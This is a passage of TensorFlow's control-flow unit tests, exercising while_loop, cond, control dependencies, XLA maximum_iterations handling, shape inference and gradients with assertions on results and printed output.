# This doesn't work with legacy control flow.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
@eager_function.defun
def cond():
return build_cond()
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(cond()), 10)
self.assertEqual(printed.contents(), "A\nB\nC\n")
@eager_function.defun
def nested_cond():
return build_nested_cond()
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(nested_cond()), 10)
self.assertEqual(printed.contents(), "A\nB\nC\n")
# wrap_function should prune.
def pruned_cond():
return build_cond()
pruned_cond = wrap_function.wrap_function(pruned_cond, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
def pruned_nested_cond():
return build_nested_cond()
pruned_nested_cond = wrap_function.wrap_function(pruned_nested_cond, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_nested_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
@test_util.run_in_graph_and_eager_modes
def testWhileAutoControlDeps(self):
# Legacy while_loop fails this test because it produces deprecation notices
# in stderr.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2: return
def cond(i, unused_x):
logging_ops.print_v2("A")
return i < 2
def body(i, x):
logging_ops.print_v2("B")
with ops.control_dependencies([logging_ops.print_v2("C")]):
x = array_ops.identity(x)
with ops.control_dependencies([logging_ops.print_v2("D")]):
return i + 1, x
def build_while():
return control_flow_ops.while_loop(
cond, body, [constant_op.constant(0), constant_op.constant(0)])
def build_nested_while():
return control_flow_ops.cond(
constant_op.constant(True), build_while, lambda: [0, 0])
# In v1 graph mode, pruning should make only "D" print.
if not context.executing_eagerly():
with self.cached_session():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_while()[0]), 2)
self.assertEqual(printed.contents(), "D\nD\n")
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_nested_while()[0]), 2)
self.assertEqual(printed.contents(), "D\nD\n")
# In defuns, all prints should execute in program order.
@eager_function.defun
def while_loop():
return build_while()[0]
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(while_loop()), 2)
self.assertEqual(printed.contents(), "A\nB\nC\nD\nA\nB\nC\nD\nA\n")
@eager_function.defun
def nested_while_loop():
return build_nested_while()[0]
# TODO(b/117840611): calling nested_while_loop fails in eager
if not context.executing_eagerly():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(nested_while_loop()), 2)
self.assertEqual(printed.contents(), "A\nB\nC\nD\nA\nB\nC\nD\nA\n")
# wrap_function should prune.
def pruned_while():
return build_while()[0]
pruned_while = wrap_function.wrap_function(pruned_while, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_while()), 2)
self.assertEqual(printed.contents(), "D\nD\n")
def pruned_nested_while():
return build_nested_while()[0]
pruned_nested_while = wrap_function.wrap_function(pruned_nested_while, [])
# TODO(b/117840611): calling nested_while_loop fails in eager
if not context.executing_eagerly():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_nested_while()), 2)
self.assertEqual(printed.contents(), "D\nD\n")
# Microbenchmark: 256,000 iterations/s.
@test_util.disable_control_flow_v2("b/116630618 (Times out)")
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, self.evaluate(r))
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result, 2)
self.assertAllEqual(v.read_value(), 1.0)
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
self.evaluate(result)
self.assertAllEqual(self.evaluate(v), 1.0)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = self.evaluate(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, self.evaluate(r))
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, self.evaluate(r))
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
@test_util.run_v1_only("b/120545219")
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
@test_util.run_v1_only("b/120545219")
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations is None. It is required and must be statically "
r"known \(e.g. a constant value or known shape dimension\) when "
r"building while_loop in XLA context."):
loop_no_maxiter = create_while_loop()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations must be statically "
r"known \(e.g. a constant value or known shape dimension\) when "
r"building while_loop in XLA context."):
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
else:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
@test_util.run_v1_only("b/120545219")
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations must be statically known \(e.g. a constant value"
r" or known shape dimension\) when building while_loop in XLA "
r"context."):
loop = create_while_loop()
xla_context.Exit()
else:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
@test_util.disable_control_flow_v2("b/118457764")
@test_util.run_v1_only("b/120545219")
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
# Pushes to the stack = product of maximum_iterations values;
# the last two "3"s comes from size(p), when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
@test_util.run_deprecated_v1
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3]
self.assertAllEqual(10100, result)
@test_util.run_deprecated_v1
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3]
self.assertAllEqual(42, result)
@test_util.run_v1_only("b/120545219")
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2]
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
@test_util.disable_control_flow_v2("b/116338794 (buffer_reuse)")
@test_util.run_v1_only("b/120545219")
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, self.evaluate(r))
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, self.evaluate(r))
def testWhile_Gpu_2(self):
self._testWhile_Gpu_2(use_gpu=False)
self._testWhile_Gpu_2(use_gpu=True)
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), self.evaluate(r))
@test_util.run_deprecated_v1
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, self.evaluate(r))
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
n = np.array([0]) # Note, [0] would not work here; that is a list
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertIsNone(r[1].shape.dims[0].value)
self.assertEqual(r[1].shape.dims[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
@test_util.run_v1_only("b/120545219")
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0], 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertEqual(r.dense_shape.get_shape().as_list(), [None])
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
@test_util.run_v1_only("b/120545219")
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0], 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0], 2)
self.assertEqual(r.values.get_shape().as_list(), [None, 2])
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
self.assertEqual(225, self.evaluate(r))
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
# Test the cases that A -> Enter and Exit -> A are partitioned.
with self.cached_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
self.assertEqual(1048576.0, self.evaluate(r))
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1])
@test_util.run_deprecated_v1
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, self.evaluate(res))
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.disable_control_flow_v2("b/79881896 (control_deps)")
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
# Ensure that no control edges by an outer control dependency context are
# added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, self.evaluate(loop))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testWhileCondWithControl_1(self):
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(4, self.evaluate(r))
self.assertAllClose(65536.0, self.evaluate(v))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testWhileCondExitControl(self):
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
# Make sure to handle correctly control edge from Exit to a node.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(6.0, self.evaluate(r))
self.assertEqual(99, self.evaluate(v))
def testCondWhile_1(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, self.evaluate(r))
def testCondWhile_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, self.evaluate(r))
def _testCondWhile_3(self, use_gpu):
with self.cached_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10., sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
@test_util.disable_control_flow_v2("b/116743589")
@test_util.run_deprecated_v1
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, self.evaluate(r))
def testWhileCond_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: control_flow_ops.cond(constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, self.evaluate(r))
def testWhileCond_3(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, self.evaluate(r))
@test_util.run_deprecated_v1
def testWhileCondGradMultiDevice(self):
config = config_pb2.ConfigProto(device_count={"CPU": 2},
allow_soft_placement=True)
with self.cached_session(use_gpu=True, config=config) as sess:
pred = array_ops.placeholder(dtypes.bool, [])
x_init = constant_op.constant(1.0)
with ops.device("/cpu:0"):
z = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, control_flow_ops.cond(
pred, lambda: x * 2.0, lambda: 10.0)),
[0, x_init])
with ops.device("/cpu:1"):
grad = gradients_impl.gradients(z, x_init)[0]
with ops.device("/cpu:0"):
grad_grad = gradients_impl.gradients(grad, x_init)[0]
self.assertEqual(sess.run(grad, {pred: True}), 8.0)
self.assertEqual(sess.run(grad, {pred: False}), 0.0)
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
return
self.assertEqual(sess.run(grad_grad, {pred: True}), 0.0)
self.assertEqual(sess.run(grad_grad, {pred: False}), 0.0)
# NOTE: It is ok to have parallel_iterations > 1
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_deprecated_v1
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3, self.evaluate(r))
result = self.evaluate(select)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
